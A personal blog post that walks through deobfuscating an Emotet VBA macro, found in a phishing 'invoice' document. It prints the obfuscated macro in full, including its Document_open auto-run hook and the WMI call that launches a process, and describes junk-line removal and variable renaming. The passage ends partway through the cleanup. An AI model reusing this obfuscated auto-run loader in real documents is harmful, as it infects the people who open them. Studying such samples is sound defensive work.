• matthew@hierthinking.com
Reverse Engineering
Reading an Obfuscated Emotet Script

Reading an Obfuscated Emotet Script

*** WARNING ***

This post contains the text of a malicious VBA script known as Emotet. The script is put here for educational purposes. Everyone is responsible for their own behavior and I do not condone any malicious use of the script hosted here. In other words, don’t do anything stupid.

*** END WARNING ***

The Email

This week my wife was sitting in the living room when she called me downstairs to look at an email she thought was suspicious. It was from our property management company. It looked like it had been sent from the property management software, and it was a reply to an email my wife had sent to them previously.

The thing that made this email suspicious was not the email itself, but the format. It contained nothing but a link with the word “invoice” next to it. We had just had a repair on our rental property done, so we were expecting an invoice of some kind, but the fact that there was no message with the email set off alarm bells for my wife.

I looked at the email and hovered over the link. I could see that the URL text did not match the link location. This was suspicious. I had my wife forward the email to me and I fired up a VM.

It was at this point that I opened the email and clicked on the link. It downloaded a .doc file with the name 03786321.doc. The first thing I did was upload this file to VirusTotal and it immediately reported that the file was infected with a malicious VBA macro called Emotet.

I did not know what Emotet was at the time so I went ahead and did some research on it. It was at this point that I decided it would be fun to take a deeper look at this malware.

I needed to know how to extract the script to see it without allowing the macro to run. After a quick Google search, I found that the contents of the .doc file can be extracted by simply naming the doc file with a .zip extension.

I was able to pull the script out of the doc file and open it in a text editor. The script below is what I saw. Click Expand Code to see the entire code file.

Expand Code
<pre class='wp-block-code'><code lang='visual-basic' class='language-visual-basic line-numbers'>Attribute VB_Name = 'Se25b9jyhzyfbn1'<br> Attribute VB_Base = '0{B7F0DA11-3823-4DA4-B320-37E0B4727005}{2C41A817-AEFE-45B5-906F-C0F3C2E5C8A6}'<br> Attribute VB_GlobalNameSpace = False<br> Attribute VB_Creatable = False<br> Attribute VB_PredeclaredId = True<br> Attribute VB_Exposed = False<br> Attribute VB_TemplateDerived = False<br> Attribute VB_Customizable = False</code> </pre>
Attribute VB_Name = "Se25b9jyhzyfbn1"
Attribute VB_Base = "0{B7F0DA11-3823-4DA4-B320-37E0B4727005}{2C41A817-AEFE-45B5-906F-C0F3C2E5C8A6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function S4182mfv7mjo3()
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 524
Nt3wgc1jdg1a7kbxci = 132
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vl1p4atr61xeq = Qy78du5wrmi9s
Yel89s4g4zc = Se25b9jyhzyfbn1.HelpContextId + 50 + 50
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 223
Nt3wgc1jdg1a7kbxci = 926
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vjwq1vm6cg2sb = Qy78du5wrmi9s
Av6yyzbc41rzex167 = ChrW(Yel89s4g4zc + (15))
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 75
Nt3wgc1jdg1a7kbxci = 628
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Ceptqw4jxymyf0o4t = Qy78du5wrmi9s
L62g0slrpxeqamio = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + Av6yyzbc41rzex167 + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Se25b9jyhzyfbn1.Bg_ky7487858u + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 742
Nt3wgc1jdg1a7kbxci = 453
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vyge9vkrd5kgtqs3 = Qy78du5wrmi9s
Qhkzo4ctpnl35 = Ysvxgwok5_q(L62g0slrpxeqamio)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 844
Nt3wgc1jdg1a7kbxci = 836
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Ofkxmk3aufyvapfkv = Qy78du5wrmi9s
Set A7izx6nxahgivmp8y = CreateObject(Qhkzo4ctpnl35)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 540
Nt3wgc1jdg1a7kbxci = 965
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Uoa02gdwe8g = Qy78du5wrmi9s
Ud44yuwmt6aawti4 = Se25b9jyhzyfbn1.A6e045c4qyyy8g.ControlTipText
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 606
Nt3wgc1jdg1a7kbxci = 720
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vpj8cl9c9rsj = Qy78du5wrmi9s
S2jw22lls9lk = W1pwr2pr77iqoocq75 + (Qhkzo4ctpnl35 + Av6yyzbc41rzex167 + Se25b9jyhzyfbn1.Xrpwix34d36wine8bi.ControlTipText + Ud44yuwmt6aawti4)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 618
Nt3wgc1jdg1a7kbxci = 44
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
S0aomqi69zg = Qy78du5wrmi9s
Dqyyju1s5tap = S2jw22lls9lk + Se25b9jyhzyfbn1.Bg_ky7487858u
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 919
Nt3wgc1jdg1a7kbxci = 434
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Mylolgnb1m5q = Qy78du5wrmi9s
Set Byzc0ihe54z50qk = F73ioqaj2vnxy8yi(Dqyyju1s5tap)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 92
Nt3wgc1jdg1a7kbxci = 771
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Suwce6o809y = Qy78du5wrmi9s
J6e_mh1uf6sgo = Array(Jyavf690bfuck + "Lbnmm6yd32cp3hkxo1 Cb1c620np50qk83ddE6uzj8js1d2yo3 Gg82_svnrij4l4s_d", A7izx6nxahgivmp8y. _
Create(Mi31og4q9cbq, Di7kp444ma7x, Byzc0ihe54z50qk), Lhwb17nd_uscq_e0 + "Fdxsit003e9hfvr5 Vv124e2cgyoh04 Vx44ajhyxd93q85_ G0ftj0p_8pc")
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 870
Nt3wgc1jdg1a7kbxci = 705
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Duwe9j3orh3klcq3jz = Qy78du5wrmi9s
End Function
Function F73ioqaj2vnxy8yi(Eem66ojf8mcr0)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 626
Nt3wgc1jdg1a7kbxci = 387
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Ibkr67x3ntrh703t = Qy78du5wrmi9s
Set F73ioqaj2vnxy8yi = CreateObject(Eem66ojf8mcr0)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 220
Nt3wgc1jdg1a7kbxci = 507
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Lt3si5i9ak4tk1h9 = Qy78du5wrmi9s
F73ioqaj2vnxy8yi. _
showwindow = P24ljns3z5ix9cy6ml + Iyn0_xguzo4e
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 728
Nt3wgc1jdg1a7kbxci = 604
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Tjz1gqqre58iwxk0d0 = Qy78du5wrmi9s
End Function
Function Ysvxgwok5_q(G59vt58tz7bxce0)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 471
Nt3wgc1jdg1a7kbxci = 459
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Rkpgqxwjop2kwx = Qy78du5wrmi9s
Dtx46j5q03mhtjc = G59vt58tz7bxce0
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 656
Nt3wgc1jdg1a7kbxci = 45
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Hayzjvti1nxybaun = Qy78du5wrmi9s
Ti5k7_w7nrtdsd044a = Split _
(Dtx46j5q03mhtjc, "58[sn ]]][ jsa 21u7gsggg")
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 462
Nt3wgc1jdg1a7kbxci = 524
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
E445jw3duuwjewj7 = Qy78du5wrmi9s
Z_51aeclufaq4 = D4bmfqgtlimp2tvgk + Join(Ti5k7_w7nrtdsd044a, Qwi1hh34zd55o71)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 445
Nt3wgc1jdg1a7kbxci = 448
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Rdnewfa5bvlzmr = Qy78du5wrmi9s
Ysvxgwok5_q = Z_51aeclufaq4
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 337
Nt3wgc1jdg1a7kbxci = 361
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
E0de4ocq5udw0yff = Qy78du5wrmi9s
End Function
Function Mi31og4q9cbq()
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 371
Nt3wgc1jdg1a7kbxci = 721
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
W4hfs4wxxqf8u = Qy78du5wrmi9s
Ia2irtdfelk8geil = Se25b9jyhzyfbn1.Xza7j9985gfykpub.Caption
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 32
Nt3wgc1jdg1a7kbxci = 638
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Wvvyeyu7bj64 = Qy78du5wrmi9s
Mi31og4q9cbq = Ysvxgwok5_q(Ia2irtdfelk8geil)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))
Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 152
Nt3wgc1jdg1a7kbxci = 21
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Rntbqk2m5d4if = Qy78du5wrmi9s
End Function

The Research

As you can see the code was no where near human readable. My goal was not to produce beautiful looking code with descriptive function and variable names. My goal was to get the code to a point where someone could reasonably be expected to trace out what it was doing.

To further that goal, I needed to figure out where to start. A quick Google search lead me to an article posted on Medium called Reverse Engineering An Obfuscated Malicious Macro by Spencer Dodd.

I browsed the article briefly and it mentioned removing any operations in the code that clearly did not do anything, which the author referred to as NOPS. A quick look through the obfuscated code revealed that there were indeed a lot of operations that didn’t seem to do anything.

Now the extent of the NOPS did not become evident to me until I was in the process moving the code over to C# to recreate what it was doing. This may be the case for any obfuscated script that you come across. I often find that thing are not as clear cut as a how to article would make it seem.

Another vital piece of information I gained from reading the article is that uninitialized variables in VBA scripts do not behave as they do in languages such as C, C++, or C#. Instead of throwing an exception, the uninitialized variable will be the default value for whatever type it is.

That may be confusing, but all it is saying is that if a uninitialized variable is used in the code as a string, it will be interpreted as an empty string during execution. Likewise, if an uninitialized variable is used as an integer in the code, it will be interpreted as a 0 during the code execution.

Exploring The Code

Since I have had exactly zero experience with VBA macros, the information from that blog post was a life saver. It was now time to take another look at the code.

The very first thing that I decided to do was to break the code apart into chunks. In the code you will notice that there are 4 different functions. After opening the code in Notepad++, I put spaces in between each of these functions instead of having them all crammed together.

Taking Care of NOPs Part 1

Next, I needed to find lines in the code that weren’t actually doing anything useful. Often in obfuscated code, they will put in useless variable assignments and other things that don’t actually have an impact on what the code does. These are referred to as NOPs. They do this to try and make it more difficult to understand.

In the obfuscated code above, you may have noticed a lot of these lines of code.

Debug.Print (CStr(Ktk97qq2a2h) & CStr(Oyjfnqd03fqyqlkda))

This is one of the first things that I noticed when looking through the code. This code does nothing useful in the code. These lines just allow the programmer to see what is happening inside the code as it is running. Since I knew these were essentially useless to me, I took every one of them out.

The code was getting shorter, but still was not readable. I saw a lot of variable assignments, and for loops, but at this point I still didn’t know what was important and what was not. To help me determine what else was there just to make my life more difficult, I decided to try to make sense of some of the code.

Renaming Variables and Functions

One of the things that I love about Notepad++ is that it has some features which make this type of work way easier. Starting at the top, in the first function, I started investigating the individual variables.

Here is the first function with the Debug lines taken out of it.

Expand Code
<pre class='wp-block-code'><code lang='visual-basic' class='language-visual-basic line-numbers'>Function S4182mfv7mjo3()<br> For Lsuwje1kyqyoht = 5 To 62<br> DoEvents<br> Next Lsuwje1kyqyoht<br> Qy78du5wrmi9s = 524<br> Nt3wgc1jdg1a7kbxci = 132<br> Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci</code> </pre>
Function S4182mfv7mjo3()
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 524
Nt3wgc1jdg1a7kbxci = 132
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vl1p4atr61xeq = Qy78du5wrmi9s
Yel89s4g4zc = Se25b9jyhzyfbn1.HelpContextId + 50 + 50
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 223
Nt3wgc1jdg1a7kbxci = 926
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vjwq1vm6cg2sb = Qy78du5wrmi9s
Av6yyzbc41rzex167 = ChrW(Yel89s4g4zc + (15))
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 75
Nt3wgc1jdg1a7kbxci = 628
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Ceptqw4jxymyf0o4t = Qy78du5wrmi9s
L62g0slrpxeqamio = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + Av6yyzbc41rzex167 + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Se25b9jyhzyfbn1.Bg_ky7487858u + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 742
Nt3wgc1jdg1a7kbxci = 453
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vyge9vkrd5kgtqs3 = Qy78du5wrmi9s
Qhkzo4ctpnl35 = Ysvxgwok5_q(L62g0slrpxeqamio)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 844
Nt3wgc1jdg1a7kbxci = 836
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Ofkxmk3aufyvapfkv = Qy78du5wrmi9s
Set A7izx6nxahgivmp8y = CreateObject(Qhkzo4ctpnl35)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 540
Nt3wgc1jdg1a7kbxci = 965
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Uoa02gdwe8g = Qy78du5wrmi9s
Ud44yuwmt6aawti4 = Se25b9jyhzyfbn1.A6e045c4qyyy8g.ControlTipText
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 606
Nt3wgc1jdg1a7kbxci = 720
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Vpj8cl9c9rsj = Qy78du5wrmi9s
S2jw22lls9lk = W1pwr2pr77iqoocq75 + (Qhkzo4ctpnl35 + Av6yyzbc41rzex167 + Se25b9jyhzyfbn1.Xrpwix34d36wine8bi.ControlTipText + Ud44yuwmt6aawti4)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 618
Nt3wgc1jdg1a7kbxci = 44
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
S0aomqi69zg = Qy78du5wrmi9s
Dqyyju1s5tap = S2jw22lls9lk + Se25b9jyhzyfbn1.Bg_ky7487858u
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 919
Nt3wgc1jdg1a7kbxci = 434
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Mylolgnb1m5q = Qy78du5wrmi9s
Set Byzc0ihe54z50qk = F73ioqaj2vnxy8yi(Dqyyju1s5tap)
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 92
Nt3wgc1jdg1a7kbxci = 771
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Suwce6o809y = Qy78du5wrmi9s
J6e_mh1uf6sgo = Array(Jyavf690bfuck + "Lbnmm6yd32cp3hkxo1 Cb1c620np50qk83ddE6uzj8js1d2yo3 Gg82_svnrij4l4s_d", A7izx6nxahgivmp8y. _
Create(Mi31og4q9cbq, Di7kp444ma7x, Byzc0ihe54z50qk), Lhwb17nd_uscq_e0 + "Fdxsit003e9hfvr5 Vv124e2cgyoh04 Vx44ajhyxd93q85_ G0ftj0p_8pc")
   For Lsuwje1kyqyoht = 5 To 62
DoEvents

Next Lsuwje1kyqyoht
Qy78du5wrmi9s = 870
Nt3wgc1jdg1a7kbxci = 705
Qy78du5wrmi9s = Qy78du5wrmi9s + Nt3wgc1jdg1a7kbxci
Duwe9j3orh3klcq3jz = Qy78du5wrmi9s
End Function

From this point, within Notepad++, I started highlighting the variable names. When you highlight a piece of text in Notepad++, any other text that matches in the document will also be highlighted. This was a simple way to see if the variables were used elsewhere.

I wanted to start with just the variable assignments, so I started right after the first for loop in the first function. I highlighted the variable Qy78du5wrmi9s. I could see that other lines were also being highlighted.

I did a CTRL + H to bring up the Find and Replace box and replaced all instances of Qy78du5wrmi9s in the text with var1. I then continued on with the next variable and named that var2. If I highlighted a variable and did not see another instance of that being used in the code, I knew it was a NOP and deleted the line.

I also renamed the functions to Run, Func2, Func3, and Func4. This was just to make it easier to read. The result is below.

Expand Code
<pre class='wp-block-code'><code lang='visual-basic' class='language-visual-basic line-numbers'>Attribute VB_Name = 'Pa_lw82d6im699edf'<br> Attribute VB_Base = '1Normal.ThisDocument'<br> Attribute VB_GlobalNameSpace = False<br> Attribute VB_Creatable = False<br> Attribute VB_PredeclaredId = True<br> Attribute VB_Exposed = True<br> Attribute VB_TemplateDerived = True<br> Attribute VB_Customizable = True</code> </pre>
Attribute VB_Name = "Pa_lw82d6im699edf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub _
Document_open()
Exploit.Run
End Sub


Attribute VB_Name = "Exploit"
Attribute VB_Base = "0{B7F0DA11-3823-4DA4-B320-37E0B4727005}{2C41A817-AEFE-45B5-906F-C0F3C2E5C8A6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Function Run()
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 524
var3 = 132
var1 = var1 + var3

var4 = Exploit.HelpContextId + 50 + 50
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 223
var3 = 926
var1 = var1 + var3

Av6yyzbc41rzex167 = ChrW(var4 + (15))
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 75
var3 = 628
var1 = var1 + var3

